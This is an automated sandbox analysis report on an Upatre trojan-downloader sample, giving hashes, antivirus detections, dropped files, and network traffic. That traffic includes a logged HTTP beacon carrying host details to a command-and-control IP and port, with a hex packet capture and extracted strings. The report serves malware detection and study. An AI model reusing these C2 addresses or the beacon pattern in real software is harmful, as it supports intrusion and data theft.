Analysis Date: 2015-05-10 11:01:00
MD5: 02fe80fd7ca65013b2d80a04d26b8314
SHA1: 6c86ed9bfc8bcf6f3141bcace979927d591695de

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section code: md5: 9ac0c3d847bc6dc3cb545f1df68fe029 sha1: 022f7359c9f6cb1995cca894e22d7c7f67e177d6 size: 2560
Section .data: md5: 5d2bfff5cad1cfdf51c67ea0d028a8ab sha1: c79d86e5b981e14425253a66e39e1bb397a1e1b1 size: 11776
Section .rsrc: md5: 4ff98c10abb8b000cd80aaf08a3cc334 sha1: d9131369a446c9ee9164ed12d42e5b97c0b9b930 size: 27136
Section .reloc: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .DAT: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Timestamp: 1997-10-28 22:08:58
PEhash: b40a54967439991ab5828a5043375b38f7a2e249
IMPhash: bb993a486057964d5a9655d0992159ef
AV Ad-Aware: Trojan.Agent.BJHJ
AV Alwil (avast): Trojan-gen:Win32:Trojan-gen
AV Arcabit (arcavir): Trojan.Agent.BJHJ
AV Authentium: W32/Upatre.E3.gen!Eldorado
AV Avira (antivir): TR/Crypt.Xpack.170501
AV BitDefender: Trojan.Agent.BJHJ
AV BullGuard: Trojan.Agent.BJHJ
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanDwnldr.Upatre.MUE.A5
AV ClamAV: no_virus
AV Dr. Web: Trojan.Upatre.201
AV Emsisoft: Trojan.Agent.BJHJ
AV Eset (nod32): Win32/TrojanDownloader.Waski.F
AV Fortinet: W32/Upatre.FAAR!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.Agent.BJHJ
AV Grisoft (avg): Downloader.Agent2.BXRJ
AV Ikarus: Evilware.Outbreak
AV K7: Riskware ( 0040eff71 )
AV Kaspersky: Trojan-Downloader.Win32.Upatre.fid
AV MalwareBytes: Trojan.Upatre
AV Mcafee: Upatre-FAAR!02FE80FD7CA6
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre.BC
AV MicroWorld (escan): Trojan.Agent.BJHJ
AV Padvish: no_virus
AV Rising: no_virus
AV Sophos: Mal/Upatre-R
AV Symantec: Downloader.Upatre
AV Trend Micro: no_virus
AV Twister: TrojanDldr.Upatre.fid.tosj
AV VirusBlokAda (vba32): BScope.Malware-Cryptor.Hlux

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\tempB83F.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\quinadet.exe

Network Details:

DNS: icanhazip.com
Type: A
104.130.28.231
DNS: icanhazip.com
Type: A
23.253.254.67
DNS: icanhazip.com
Type: A
166.78.246.145
HTTP GET: http://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
HTTP GET: http://81.7.109.65:13360/SATAS12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Flows TCP: 192.168.1.1:1031 ➝ 104.130.28.231:80
Flows TCP: 192.168.1.1:1032 ➝ 81.7.109.65:13360
Flows TCP: 192.168.1.1:1033 ➝ 91.240.97.66:443
Flows TCP: 192.168.1.1:1034 ➝ 91.240.97.66:443
Flows TCP: 192.168.1.1:1035 ➝ 91.240.97.66:443
Flows TCP: 192.168.1.1:1036 ➝ 91.240.97.66:443
Flows TCP: 192.168.1.1:1037 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1038 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1039 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1040 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1041 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1042 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1043 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1044 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1045 ➝ 91.240.97.64:443
Flows TCP: 192.168.1.1:1046 ➝ 91.240.97.64:443
Flows TCP: 192.168.1.1:1047 ➝ 91.240.97.64:443
Flows TCP: 192.168.1.1:1048 ➝ 91.240.97.64:443
Flows TCP: 192.168.1.1:1049 ➝ 91.240.97.54:443
Flows TCP: 192.168.1.1:1050 ➝ 91.240.97.54:443
Flows TCP: 192.168.1.1:1051 ➝ 91.240.97.54:443
Flows TCP: 192.168.1.1:1052 ➝ 91.240.97.54:443
Flows TCP: 192.168.1.1:1053 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1054 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1055 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1056 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1057 ➝ 91.240.97.45:443
Flows TCP: 192.168.1.1:1058 ➝ 91.240.97.45:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b57 4f573634 29204170   NT 6.1;WOW64) Ap
0x00000060 (00096)   706c6557 65624b69 742f3533 372e3336   pleWebKit/537.36
0x00000070 (00112)   20284b48 544d4c2c 206c696b 65204765    (KHTML, like Ge
0x00000080 (00128)   636b6f29 0d0a486f 73743a20 6963616e   cko)..Host: ican
0x00000090 (00144)   68617a69 702e636f 6d0d0a43 61636865   hazip.com..Cache
0x000000a0 (00160)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000b0 (00176)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f534154 41533132 2f434f4d   GET /SATAS12/COM
0x00000010 (00016)   50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032)   312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000050 (00080)   6f777320 4e542036 2e313b57 4f573634   ows NT 6.1;WOW64
0x00000060 (00096)   29204170 706c6557 65624b69 742f3533   ) AppleWebKit/53
0x00000070 (00112)   372e3336 20284b48 544d4c2c 206c696b   7.36 (KHTML, lik
0x00000080 (00128)   65204765 636b6f29 0d0a486f 73743a20   e Gecko)..Host: 
0x00000090 (00144)   38312e37 2e313039 2e36353a 31333336   81.7.109.65:1336
0x000000a0 (00160)   300d0a43 61636865 2d436f6e 74726f6c   0..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
5&f,(&R?0
$7[|P.p
8Ni=%t
ACKMIOz
|ACKMIz
ACUIProviderInvokeUI
aL-xS-
AmpFactorToDB
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
B.data
BmQueryBounds
BmRelease
BmSaveToStream
|CAKMIz
CheckNetDrive
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
ConnectDlgProc
CreatePipe
CryptUIDlgCertMgr
CryptUIDlgFreeCAContext
CryptUIDlgSelectCA
CryptUIDlgSelectCertificateA
CryptUIDlgSelectCertificateFromStore
CryptUIDlgSelectCertificateW
CryptUIDlgSelectStoreA
CryptUIDlgSelectStoreW
CryptUIDlgViewContext
CryptUIDlgViewCRLA
CryptUIDlgViewCRLW
CryptUIDlgViewCTLA
CryptUIDlgViewCTLW
CryptUIDlgViewSignerInfoA
CryptUIDlgViewSignerInfoW
CRYPTUI.dll
c?(!T?%
DefCreate
DefCreateFromClip
DefCreateFromFile
DefCreateFromTemplate
DefCreateInvisible
DefLoadFromStream
DibChangeData
DibClone
DibCopy
DibDraw
DibEnumFormat
,dmXrX?
DNSAPI.dll
DnsQuery_A
DnsQueryConfig
DnsQueryConfigAllocEx
DnsQueryConfigDword
DnsQueryExA
DnsQueryExUTF8
DnsQueryExW
DnsQuery_UTF8
DnsQuery_W
DnsRecordBuild_UTF8
DnsRecordBuild_W
DnsRecordCompare
DnsRecordCopyEx
DnsRecordListFree
DnsRecordSetCompare
DnsRecordSetCopyEx
DUserCastClass
DUserDeleteGadget
duser.DLL
:E;com;
EnumCalendarInfoW
ExitProcess
fmifs.dll
GetCommandLineA
GetCommState
GetOEMCP
GetVersionExW
GetWindowsDirectoryA
)gUWSg
&%h5KVDM
heio.h2\sbhtem3h\sys
IsRasmanProcess
i <XvQ^1|
/	Jz?a
kernel32.dll
,#kyaJ
lpk.dll
LpkEditControl
LpkGetCharacterPlacement
MprAdminInterfaceCreate
mprapi.dll
msvcrt.dll
olecli32.dll
>p0!HNa;
PdhCreateSQLTablesW
pdh.dll
PdhEnumLogSetNamesA
PdhEnumLogSetNamesW
PdhEnumMachinesA
PdhEnumMachinesHA
PdhEnumMachinesHW
PdhEnumMachinesW
PdhEnumObjectItemsA
PdhEnumObjectItemsHA
PdhEnumObjectItemsHW
PdhEnumObjectItemsW
PdhEnumObjectsA
PdhEnumObjectsHA
PdhEnumObjectsHW
PdhEnumObjectsW
PdhExpandCounterPathA
pstorec.dll
PStoreCreateInstance
qB=9l|*
quartz.dll
QueryDeviceInformation
QueryDosDeviceA
RasActivateRoute
RasActivateRouteEx
RasAddConnectionPort
RasAddNotification
RasAllocateRoute
RasBundleClearStatistics
RasBundleClearStatisticsEx
RasBundleGetPort
RasBundleGetStatistics
RasBundleGetStatisticsEx
RasCompressionGetInfo
RasCompressionSetInfo
RasConnectionEnum
RasConnectionGetStatistics
RasCreateConnection
RasDeAllocateRoute
RasDestroyConnection
RasDeviceConnect
rasman.dll
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.reloc
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
</security>
<security>
TaL]Au7
!This program cannot be run in DOS mode.
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
v_][_+
wx-zN+(s
YAfjrq
( _Y][SQ
Y][SQ3